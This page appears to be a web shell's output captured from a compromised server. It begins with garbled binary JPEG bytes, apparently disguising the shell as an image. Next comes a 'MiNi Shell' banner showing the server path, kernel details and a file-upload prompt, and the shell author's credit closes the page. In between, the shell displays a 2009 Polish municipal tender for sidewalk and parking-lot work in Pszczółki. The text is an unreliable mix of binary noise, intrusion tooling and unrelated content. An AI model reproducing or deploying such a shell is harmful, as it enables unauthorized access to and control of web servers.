JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090821/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090821/138297-N-2009.html

<p class="kh_header"><b>Pszczółki: Przebudowa chodnika wzdłuż drogi powiatowej nr 2210G w miejscowości Pszczółki - etap II (strona lewa ul. Pomorskiej w kierunku od ul. Lipowej do drogi krajowej nr 1) wraz z wjazdem do OSP oraz remont parkingu przy OSP.</b><br>
<b>Numer ogłoszenia: 138297 - 2009; data zamieszczenia: 21.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pszczółki , ul. Pomorska 18, 83-032 Pszczółki, woj. pomorskie, tel. 058 6839128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pszczolki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa chodnika wzdłuż drogi powiatowej nr 2210G w miejscowości Pszczółki - etap II (strona lewa ul. Pomorskiej w kierunku od ul. Lipowej do drogi krajowej nr 1) wraz z wjazdem do OSP oraz remont parkingu przy OSP..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zrealizowanie II etapu przebudowy chodnika wzdłuż drogi powiatowej Nr 2210G w Pszczółkach, na odcinku ~250 mb ulicy Pomorskiej, od wjazdu do OSP (przy ul. Lipowej) w kierunku skrzyżowania z drogą krajową nr 1 oraz remont parkingu przy OSP.
Zakres prac dotyczy chodnika znajdującego się po lewej stronie ul. Pomorskiej (nieparzyste numery budynków oraz wjazdu do OSP).

Zakres robót drogowych obejmuje:
CZĘŚĆ I
I. Roboty w zakresie budowy chodnika:
- Wykonanie robót rozbiórkowych istniejących nawierzchni na odcinku ~ 250 mb;
- Wykonanie koryta wraz z podbudową na odcinku ~250 mb;
- Ustawienie krawężników betonowych 15 x 30 na ławie betonowej na odcinku ~250 mb; 
- Ustawienie krawężników betonowych przejazdowych 15 x 22 na podsypce piaskowo - cementowej na odcinku ~ 47 mb;
- Ustawienie krawężników betonowych skośnych 15 x 22/30 na podsypce piaskowo - cementowej na odcinku ~ 14 mb;
- Ustawienie obrzeży betonowych 30 x 8 na podsypce piaskowo - cementowej na odcinku ~ 205 mb;
- Wykonanie nawierzchni z kostki brukowej betonowej szarej, grub. 6cm na podsypce piaskowo - cementowej (chodniki) na powierzchni ~ 405 m2;
- Wykonanie nawierzchni z kostki brukowej betonowej czerwonej, grub. 8 cm na podsypce piaskowo - cementowej (zjazdy) na powierzchni ~ 180 m2.
II. Roboty w zakresie wykonania wjazdu do OSP:
- Wykonanie robót rozbiórkowych obejmujących rozbiórkę: obrzeża chodnikowego na długości ok. 21 m, istniejącej nawierzchni z poolbruku na powierzchni 21 m2 nawierzchni z mieszanek mineralno bitumicznych na powierzchni 40 m2 oraz podbudowy na powierzchni 60m2 ;
- Wykonanie koryta wraz z podbudową na powierzchni ~ 111 m2;
- Ustawienie krawężników betonowych przejazdowych 15 x 22 na podsypce piaskowo - cementowej na odcinku ~ 42 mb;
- Wykonanie nawierzchni z kostki brukowej cementowej szarej grub. 6 cm na podsypce piaskowo - cementowej na powierzchni ~ 23 m2.
- Wykonanie nawierzchni z kostki brukowej cementowej czerwonej grub. 8 cm na podsypce piaskowo - cementowej na powierzchni ~ 88 m2.
III  Roboty wykończeniowe: 
- Regulacja pionowa studzienek włazów kanałowych, studzienek telekomuni-kacyjnych, studzienek zaworów wodociągowych w ilości  7 sztuk;
- Humusowanie skarp wraz z obsiewem na powierzchni ~ 12 m2.
CZĘŚĆ II
Remont parkingu przy OSP
- rozbiórka istniejącej nawierzchni betonowej na powierzchni ok 100 m2
- ustawienie obrzeży betonowych 30 x 8 na podsypce piaskowo cementowej na odcinku ok. 20 m
- wykonanie nawierzchni z kostki brukowej betonowej czerwonej, grubości 8 cm na podsypce piaskowo cementowej na powierzchni ok. 100 m2.

Załącznikami do SIWZ są następujące dokumenty:
1. dokumentacja projektowa,
2. specyfikacja techniczna wykonania i odbioru robót,
3. przedmiary robót.

Roboty należy prowadzić zgodnie z instrukcjami i zaleceniami zawartymi w ww. dokumentacji. Wszelkie zmiany technologii i wynikające z tego konsekwencje obciążają Wykonawcę. Przedmiot zamówienia musi być objęty gwarancją i rękojmią 36 miesięcy od daty odbioru końcowego robót.
Jeżeli zapisy Specyfikacji Technicznych są odmienne od zapisów zawartych w niniejszej Specyfikacji Istotnych Warunków Zamówienia (SIWZ) i projekcie umowy, pierwszeństwo mają zapisy SIWZ i projektu umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający ustala wadium w wysokości 5.000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział Wykonawcy, którzy: 
a) prowadzą zarejestrowaną działalność gospodarczą zgodną z przedmiotem zamówienia,
b) posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
c) w okresie ostatnich 5 lat wykonali 3 zadania odpowiadające rodzajem i wartością  robotom stanowiącym przedmiot zamówienia,
d) dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
e) posiadają środki finansowe lub zdolność kredytową pozwalające na sfinansowanie przedmiotu zamówienia,
f) nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
2. Wykonawcy składający ofertę wspólnie muszą: 
a) ustanowić pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
b) spełniać warunki określone w pkt. 1. lit.a), c), d), e) - wspólnie, natomiast w pkt. 1. lit b), f) - każdy z osobna,
c) zawrzeć umowę regulującą współpracę podmiotów.
3. Zamawiający dokona oceny spełnienia wymaganych warunków metodą spełnia / nie spełnia oraz na podstawie analizy dokumentów i oświadczeń dostarczonych przez Wykonawców.
W przypadku Wykonawców składających ofertę wspólnie, wymogi określone w pkt 1. a) oraz c) musi spełniać w całości przynajmniej jeden z Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na ofertę Wykonawcy składa się wypełniony i podpisany druk oferta wg wzoru znajdującego się w części II SIWZ, oświadczenie o spełnieniu warunków udziału w postępowaniu - zał. do OFERTY oraz dokumenty i oświadczenia potwierdzające spełnienie tych warunków:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b) polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej,
c) wykaz trzech wykonanych w ciągu ostatnich 5 lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym, stanowiącym przedmiot zamówienia, z podaniem: wartości, daty i miejsca wykonania oraz dokumentów potwierdzających, że roboty te zostały wykonane należycie,
d) oświadczenie o dysponowaniu potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (zał. do OFERTY) lub przedstawienie pisemnego zobowiązania potwierdzającego udostępnieniu potencjału technicznego 
i osób zdolnych do wykonania zamówienia od innych podmiotów,
e) oświadczenie o znajdowaniu się w sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia (zał. do OFETRY),
f) oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych (zał. do OFERTY),
g) w przypadku złożenia oferty wspólnej - pełnomocnictwo do reprezentowania w postępowaniu  wraz z umową regulującą współpracę podmiotów. 
2. Dokumenty złożone przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia będą rozpatrywane łącznie, z zastrzeżeniem pkt. 6 lit. a), b), f). 
3. Zamawiający żąda, aby przedstawione dokumenty były sporządzone w języku polskim, w oryginale lub formie kserokopii poświadczonej, na każdej stronie, za zgodność z oryginałem przez składającego ofertę. 
4. Wykonawcy składający ofertę wspólną będą ponosić solidarną odpowiedzialność za wykonanie umowy zgodnie z jej postanowieniami.
5. Zamawiający może w ramach solidarnej odpowiedzialności żądać wykonania umowy od wszystkich partnerów łącznie lub od każdego z osobna..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.pszczolki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, 
Pszczółki, ul. Pomorska 18, 
sekretariat - pokój nr 1..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2009 godzina 09:00, miejsce: Siedziba Zamawiającego, 
Pszczółki, ul. Pomorska 18, 
sekretariat - pokój nr 1..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty budowlane w zakresie budowy chodnika oraz wjazdu do OSP..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I
I. Roboty w zakresie budowy chodnika:
- Wykonanie robót rozbiórkowych istniejących nawierzchni na odcinku ~ 250 mb;
- Wykonanie koryta wraz z podbudową na odcinku ~250 mb;
- Ustawienie krawężników betonowych 15 x 30 na ławie betonowej na odcinku ~250 mb; 
- Ustawienie krawężników betonowych przejazdowych 15 x 22 na podsypce piaskowo - cementowej na odcinku ~ 47 mb;
- Ustawienie krawężników betonowych skośnych 15 x 22/30 na podsypce piaskowo - cementowej na odcinku ~ 14 mb;
- Ustawienie obrzeży betonowych 30 x 8 na podsypce piaskowo - cementowej na odcinku ~ 205 mb;
- Wykonanie nawierzchni z kostki brukowej betonowej szarej, grub. 6cm na podsypce piaskowo - cementowej (chodniki) na powierzchni ~ 405 m2;
- Wykonanie nawierzchni z kostki brukowej betonowej czerwonej, grub. 8 cm na podsypce piaskowo - cementowej (zjazdy) na powierzchni ~ 180 m2.
 II. Roboty w zakresie wykonania wjazdu do OSP:
- Wykonanie robót rozbiórkowych obejmujących rozbiórkę: obrzeża chodnikowego na długości ok. 21 m, istniejącej nawierzchni z poolbruku na powierzchni 21 m2 nawierzchni z mieszanek mineralno bitumicznych na powierzchni 40 m2 oraz podbudowy na powierzchni 60m2 ;
- Wykonanie koryta wraz z podbudową na powierzchni ~ 111 m2;
- Ustawienie krawężników betonowych przejazdowych 15 x 22 na podsypce piaskowo - cementowej na odcinku ~ 42 mb;
- Wykonanie nawierzchni z kostki brukowej cementowej szarej grub. 6 cm na podsypce piaskowo - cementowej na powierzchni ~ 23 m2.
- Wykonanie nawierzchni z kostki brukowej cementowej czerwonej grub. 8 cm na podsypce piaskowo - cementowej na powierzchni ~ 88 m2.
III  Roboty wykończeniowe: 
- Regulacja pionowa studzienek włazów kanałowych, studzienek telekomuni-kacyjnych, studzienek zaworów wodociągowych w ilości  7 sztuk;
- Humusowanie skarp wraz z obsiewem na powierzchni ~ 12 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont parkingu przy OSP.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont parkingu przy OSP
- rozbiórka istniejącej nawierzchni betonowej na powierzchni ok 100 m2
- ustawienie obrzeży betonowych 30 x 8 na podsypce piaskowo cementowej na odcinku ok. 20 m
- wykonanie nawierzchni z kostki brukowej betonowej czerwonej, grubości 8 cm na podsypce piaskowo cementowej na powierzchni ok. 100 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com